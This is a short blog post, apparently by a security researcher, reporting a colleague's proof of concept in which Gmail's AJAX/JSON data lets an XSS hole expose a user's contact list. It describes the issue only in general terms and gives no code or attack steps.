beNi and I have been talking a lot about some issues within Gmail where too much information is disclosed by AJAX and JSON. Alas, it has finally been proven to allow for information disclosure. The example he built is based off a tiny XSS hole (that requires user interaction) but any XSS hole will do, this is only a proof of concept. Click here to see his post on the topic.
This is the second time Google has had this issue (the first was found by Jeremiah Grossman over a year ago). It’s not a good idea to have sensitive information stored like this, but really, once you find XSS on a system it’s almost irrelevant. But from this point forward your contact list will be vulnerable every time an XSS exploit is found (of which there are probably hundreds on the site at the moment). Not to mention the other terrible things you can do to Google consumers once you have XSS on Google. Nice find, beNi!